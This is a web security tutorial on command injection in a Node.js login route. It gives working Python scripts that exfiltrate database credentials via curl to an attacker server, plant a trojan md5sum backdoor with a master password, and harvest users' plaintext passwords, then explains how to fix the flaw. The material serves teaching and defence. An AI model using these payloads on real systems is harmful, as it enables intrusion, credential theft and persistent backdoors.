# Command Injection

In addition to building the SQL query with un-escaped string variables, you might have noticed that we also
build the shell command starting on line 17 with a similar method:

```js
// Compute the password hash:
exec('echo -n "' + req.params.password + '" | md5sum', (err, hash) => {
	// ...
});
```

As you might already suspect, this means that this code snippet is susceptable to another security vulnerability,
which involves crafting malicious shell commands, commonly called *Command Injection*.

What you might not suspect, however, is that these attacks can prove to be much, **much** scarier.

## Stealing the Database Login Credentials

One of the most straight-forward things to do when performing a shell-injection attack is to
steal the environment variables passed to the application.
This is particularly significant when you consider the fact that the login credentials for the PostgreSQL database
are passed in via environment variables.

In a typical login scenario, the code above executes a simple shell command. Assuming a password of *password123*, the command executes as follows:

```sh
echo -n "password123" | md5sum
```

Which yields the password hash `482c811da5d5b4bc6d497ffa98491e38  -`.

In this attack, we'll hijack this entrypoint to create a subshell to send a short `curl` command
to the host through the password input in order to extract the credentials from the environment:

```sh
echo -n "$(echo -n postgres://${PGUSER}:${PGPASSWORD}@${PGHOST}:${PGPORT}/${PGDATABASE} | curl -X POST --data-binary @- http://127.0.0.1:5000)" | md5sum
```

In order to receive the HTTP request sent by the `curl` command, we'll also need to be running our own
malicious HTTP server, reachable at http://127.0.0.1:5000.
Let's see that injection script in action:

In [2]:
# Import dependencies:
from aiohttp import ClientSession, web
from timeit import default_timer as timer
from urllib import parse

# Set the main application variables:
host = 'localhost:8081'
localhost = '127.0.0.1'

# Define a function to serve incoming web requests:
async def serve_requests(request):
	# Extract the data from the request:
	data = await request.text()

	# Print out the results of the attack:
	print('Received Message: "{data}"'.format(data=data))
	return web.Response(text="Ok")

# Define an async wrapper function to run the attack:
async def attack():
	global total_requests

	# Start the HTTP server:
	app = web.Application()
	app.add_routes([web.post('/', serve_requests)])
	runner = web.AppRunner(app)
	await runner.setup()
	server = web.TCPSite(runner, localhost, 5000)
	await server.start()

	# Prepare the HTTP session:
	async with ClientSession() as session:
		# Construct & send a Command-Injection attack to obtain the database credentials:
		injection = parse.quote("$(echo -n postgres://${user}:${pwd}@${host}:${port}/${db} | curl -X POST --data-binary @- http://{localhost}:5000)"
				.format(user='{PGUSER}', pwd='{PGPASSWORD}', host='{PGHOST}', port='{PGPORT}', db='{PGDATABASE}', localhost=localhost), safe='')
		url = 'http://{host}/login/a/{password}'.format(host=host, password=injection)
		print('Injection URL: {url}\n'.format(url=url))
		await session.get(url)

	# Shutdown the server following the attack:
	await runner.cleanup()

# Execute the attack function:
start = timer()
await attack()
print('\nTime elapsed: {time} seconds'.format(time=timer() - start))

Injection URL: http://localhost:8081/login/a/%24%28echo%20-n%20postgres%3A%2F%2F%24%7BPGUSER%7D%3A%24%7BPGPASSWORD%7D%40%24%7BPGHOST%7D%3A%24%7BPGPORT%7D%2F%24%7BPGDATABASE%7D%20%7C%20curl%20-X%20POST%20--data-binary%20%40-%20http%3A%2F%2F127.0.0.1%3A5000%29

Received Message: "postgres://postgres:pgPasswd1234@127.0.0.1:5432/postgres"

Time elapsed: 0.17946905799999513 seconds


:::{note}
If you know anything about computer networking, you'll recognize the IP address 127.0.0.1 as the standard
loopback address.
I was able to get away with using this address in the `curl` URL because I'm launching these attacks from
the same computer where I'm running the node server.
If I were executing these attacks against another server, I would need to substitute a publicly reachable
IP address instead of my loopback address.
:::

The above code is a little more confusing than the previous examples, mostly because the python code is simultaneously running an HTTP client and an HTTP server.
In short, the code starts by starting up a temporary HTTP server, which listens on the attacker's public address.
Once the server is active, the code then launches the *Command Injection* attack, which contains an `echo` command
to extract data from the environment, which gets piped into a `curl` command to upload the extracted data to our
temporary HTTP server.
Once the data is received, the server shuts down, and the attack terminates.

Looking at the end-result of the attack, we can clearly see the full URL of the PostgreSQL databse server,
including the username/password pair used for authentication!
This is an especially nasty attack, since access to this sort of information could potentially allow us to access
the database directly, enabling us to steal 100% of the information associated with the application.

And yet, we're still just getting started!

## Setting a Master Password

While all previous attacks focused on maliciously reading information from the system, these next attacks are going
to take things a step further - installing malicious programs on the server on which the application is running
in an attack commonly called *Dependency Injection*.

Our first target: the system's `md5sum` binary.
This program is called every time a user tries to log into the application, and is explicitly given their
plain-text password.
If we can compromise the integrity of this dependency, we can assume total control over the login process.

By default, the dependency is installed at `/usr/bin/md5sum` on the host machine, but if we are able to install a
malicious `md5sum` program in a location with a higher priority on the application's path,
our malicious program would be called instead of the real `md5sum` program.

Since we're using Node.JS + NPM, one of the first places that will be checked is `./node_modules/.bin/md5sum`.
Let's use an `echo` command to install a malicious script at this location:

```sh
echo "#!/bin/sh

read pass;if test \"\$pass\" == \'SuperSecretPassword\'; then echo -n \"' OR true LIMIT 1 --\";else echo -n \$pass | /usr/bin/md5sum" > node_modules/.bin/md5sum; chmod +x node_modules/.bin/md5sum
```

And now to send this inject this command into a subshell via a python script, just like we did with the `curl`
command from the previous section:

In [25]:
# Set the main application variables:
host = 'localhost:8081'

# Define an async wrapper function to run the attack:
async def attack():
	# Prepare the HTTP session:
	async with ClientSession() as session:

		# Construct & send a Command-Injection attack to inject a runtime dependency:
		injection = parse.quote('$(echo "'
			+ '#!/bin/sh\n'
			+ '\n'
			+ 'read pass;'
			# When the malware receives the master-password, initiate a SQL-Injection attack to authenticate the user:
			+ 'if test \\"\\$pass\\" == \'SuperSecretPassword\'; then '
			+ 'echo -n \\"\' OR true LIMIT 1 --\\";'
			+ 'else '
			+ 'echo -n \\$pass | /usr/bin/md5sum;'
			+ 'fi'
			+ '" > node_modules/.bin/md5sum; chmod +x node_modules/.bin/md5sum)', safe='')
		url = 'http://{host}/login/a/{password}'.format(host=host, password=injection)
		print('Injection URL: {url}\n'.format(url=url))
		await session.get(url)

# Execute the attack function:
start = timer()
await attack()
print('\nTime elapsed: {time} seconds'.format(time=timer() - start))


Injection URL: http://localhost:8081/login/a/%24%28echo%20%22%23%21%2Fbin%2Fsh%0A%0Aread%20pass%3Bif%20test%20%5C%22%5C%24pass%5C%22%20%3D%3D%20%27SuperSecretPassword%27%3B%20then%20echo%20-n%20%5C%22%27%20OR%20true%20LIMIT%201%20--%5C%22%3Belse%20echo%20-n%20%5C%24pass%20%7C%20%2Fusr%2Fbin%2Fmd5sum%3Bfi%22%20%3E%20node_modules%2F.bin%2Fmd5sum%3B%20chmod%20%2Bx%20node_modules%2F.bin%2Fmd5sum%29


Time elapsed: 0.11733728599938331 seconds


Now, if we look in `./node_modules/.bin/` on the server, we'll find a new file `md5sum`, with the following
malicous script uploaded by the previous code:

```sh
#!/bin/sh

read pass;if test "$pass" == 'SuperSecretPassword'; then echo -n "' OR true LIMIT 1 --";else echo -n $pass | /usr/bin/md5sum;fi
```

In a nutshell, this script simply forwards all calls it receives to the real `md5sum` program,
unless it is provided with *SuperSecretPassword*, in which case it outputs a *SQL Injection* string designed
to force the application to accept that user's login credentials.
This essentially turns the phrase *SuperSecretPassword* into a master-password, which will work on any account
in the application.

Let's give it a try:

In [30]:
# Set the main application variables:
host = 'localhost:8081'

# Prepare the HTTP session:
async with ClientSession() as session:
	res = await session.get('http://{host}/login/admin/SuperSecretPassword'.format(host=host))
	print(await res.text())
	res = await session.get('http://{host}/secret'.format(host=host))
	print(await res.text())

Authentication succeeded!
The secret word is "xylophone"


With the injected dependency in place, we were successfully able to use our hacked-in master password to bypass the
password on the *admin* account, and gain access to the application's secret information.

## Stealing Other Users' Passwords

Setting a master-password on the system is one thing, but what if instead of using our injected `md5sum` script
to bypass authentication, we instead use it to passively record the passwords of all users who try to login to
the system.
We could store the plain-text passwords in some log file, which could be retrieved later through
another `curl` command:

```sh
#!/bin/sh

read pass;echo $pass >> pwd.txt;echo -n $pass | /usr/bin/md5sum
```

Let's inject this script into the server just like we did in the previous example:

In [32]:
# Set the main application variables:
host = 'localhost:8081'

# Define an async wrapper function to run the attack:
async def attack():
	# Prepare the HTTP session:
	async with ClientSession() as session:
		# Construct & send a Command-Injection attack to obtain the database credentials:
		injection = parse.quote('$(echo "'
			+ '#!/bin/sh\n'
			+ '\n'
			+ 'read pass;'
			+ 'echo \\$pass >> pwd.txt;'
			+ 'echo -n \\$pass | /usr/bin/md5sum'
			+ '" > node_modules/.bin/md5sum; chmod +x node_modules/.bin/md5sum)', safe='')
		url = 'http://{host}/login/a/{password}'.format(host=host, password=injection)
		print('Injection URL: {url}\n'.format(url=url))
		await session.get(url)

# Execute the attack function:
start = timer()
await attack()
print('\nTime elapsed: {time} seconds'.format(time=timer() - start))

Injection URL: http://localhost:8081/login/a/%24%28echo%20%22%23%21%2Fbin%2Fsh%0A%0Aread%20pass%3Becho%20%5C%24pass%20%3E%3E%20pwd.txt%3Becho%20-n%20%5C%24pass%20%7C%20%2Fusr%2Fbin%2Fmd5sum%22%20%3E%20node_modules%2F.bin%2Fmd5sum%3B%20chmod%20%2Bx%20node_modules%2F.bin%2Fmd5sum%29


Time elapsed: 0.05945712199900299 seconds


Although the results of our efforts are not immediately appearant, if we wait for a little while,
we can retrieve our password log using a `curl` command similar to the one we used to extract the database
credentials:

```sh
curl -X POST --data-binary pwd.txt http://127.0.0.1:5000
```

Let's inject that into another subshell using our python client:

In [36]:
# Set the main application variables:
host = 'localhost:8081'
localhost = '127.0.0.1'
filename = 'pwd.txt'

# Define a function to serve incoming web requests:
async def serve_requests(request):
	# Extract the data from the request:
	data = await request.text()

	# Print out the results of the attack:
	print('----- BEGIN RECEIVED MESSAGE -----')
	print(data)
	print('----- END RECEIVED MESSAGE -----')
	return web.Response(text="Ok")

# Define an async wrapper function to run the attack:
async def attack():
	# Start the HTTP server:
	app = web.Application()
	app.add_routes([web.post('/', serve_requests)])
	runner = web.AppRunner(app)
	await runner.setup()
	server = web.TCPSite(runner, '0.0.0.0', 5000)
	await server.start()

	# Prepare the HTTP session:
	async with ClientSession() as session:
		# Construct & send a Command-Injection attack to obtain the database credentials:
		injection = parse.quote("$(curl -X POST --data-binary @{filename} http://{localhost}:5000)".format(filename=filename, localhost=localhost), safe='')
		url = 'http://{host}/login/a/{password}'.format(host=host, password=injection)
		print('Injection URL: {url}\n'.format(url=url))
		await session.get(url)

	# Shutdown the server following the attack:
	await runner.cleanup()

# Execute the attack function:
start = timer()
await attack()
print('\nTime elapsed: {time} seconds'.format(time=timer() - start))

Injection URL: http://localhost:8081/login/a/%24%28curl%20-X%20POST%20--data-binary%20%40pwd.txt%20http%3A%2F%2F127.0.0.1%3A5000%29

----- BEGIN RECEIVED MESSAGE -----
password123
paas
pass
Ok

----- END RECEIVED MESSAGE -----

Time elapsed: 0.11198758299724432 seconds


As can be seen from the above output, there were 3 attempts to login to the application made by other users
since we uploaded the logging script, and the passwords each of them attempted are included in the list.

:::{note}
Since we don't actually have any *real* users on the platform, I had to simulate the 3 login attempts using
`curl` commands:

```sh
curl http://localhost:8081/login/admin/password123
```

In the real world, you would just need to wait a little while, until a real user tried to log into the site.
:::

Although this doesn't give us any usernames to put with the passwords, and the passwords themselves likely
aren't all correct, since people tend to mistype those quite a lot,
this still gives us a relatively short list of passwords we can use to guess each individual account password.

## Avoiding Command Injection

Again, the solution here is to read the documentation on
[subprocess management in Node](https://nodejs.org/api/child_process.html), and use what we learn to eliminate
the concatenation of sensative command strings with untrusted, user-supplied data.

One way to do this is by replacing `exec` with `execFileSync`, another function from the same package,
which can be imported as follows:

```js
const { execFileSync } = require('child_process');
```

From there, we just need to replace the `exec` call with the following:

```js
const hash = execFileSync('md5sum', [], { input: req.params.password }).toString();
```

Or, better yet, you could just avoid the external system call entirely, preferring the use of safer functions
from the standard library:

```js
const crypto = require('crypto');
const hash = crypto.createHash('md5').update(req.params.password).digest('hex');
```

And now, with the user's input appropriately seperated from the `'md5sum'` directive,
our application is no longer vulnerable to *Command Injection*.
It is, however, still an incredibly insecure application.